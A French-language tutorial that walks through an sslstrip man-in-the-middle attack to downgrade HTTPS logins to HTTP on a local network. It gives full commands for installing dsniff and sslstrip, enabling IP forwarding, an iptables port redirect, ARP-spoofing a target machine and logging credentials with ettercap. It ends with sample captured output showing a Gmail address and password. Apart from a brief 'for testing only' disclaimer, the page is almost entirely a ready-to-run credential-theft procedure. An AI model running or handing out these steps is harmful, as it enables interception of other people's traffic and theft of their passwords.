Web
Logiciels
Sslstrip
Tester la sécurité d'une connexion SSL (https)
Pour : Linux, Debian, Ubuntu, ...
Ce tutoriel est avant tout mis à disposition pour tester la sécurité d'un réseau et non pas pour pirater.
Ne vous croyez pas sécurisé quand vous tappez un mot de passe sur internet (facebook, twitter, youtube, gmail, hotmail, ...).
Sslstrip va permettre de détourner le trafic sécurisé HTTPS en le redirigeant vers du HTTP avec une attaque man in the middle et va même allez remplacé le favicon par un petit cadenas.
Prérequis
Installation de python et des outils Dsnif:
apt-get install python apt-get install python-twisted-web apt-get install dsniff
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz tar xvzf sslstrip-0.9.tar.gz cd sslstrip-0.9 python setup.py install
# ifconfig eth0 Link encap:Ethernet HWaddr 01:2f:b3:d9:a1:d5 inet adr:192.168.1.15 Bcast:192.168.1.255 Masque:255.255.255.0 adr inet6: fe80::20e:a6ff:fef7:e5bf/64 Scope:Lien UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6063 errors:0 dropped:0 overruns:0 frame:0 TX packets:6351 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 RX bytes:5173155 (4.9 MiB) TX bytes:1190803 (1.1 MiB) Interruption:17 lo Link encap:Boucle locale inet adr:127.0.0.1 Masque:255.0.0.0 adr inet6: ::1/128 Scope:Hôte UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:65 errors:0 dropped:0 overruns:0 frame:0 TX packets:65 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 RX bytes:9673 (9.4 KiB) TX bytes:9673 (9.4 KiB)
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 12000
python sslstrip.py -w secret.txt -a -l 12000 -f
arpspoof -i eth0 -t 192.168.1.20 192.168.1.1
# ettercap -T -q -i eth0 ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on eth1... (Ethernet) eth0 -> 01:2F:B3:D9:A1:D5 192.168.1.15 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help
# ettercap -T -q -i eth0 >> pass.txt
HTTP : 74.125.40.102:80 -> USER: supertotoman@gmail.com PASS: toto INFO: http://www.google.com/accounts/ServiceLogin?hl=fr&continue=http://www.google.fr/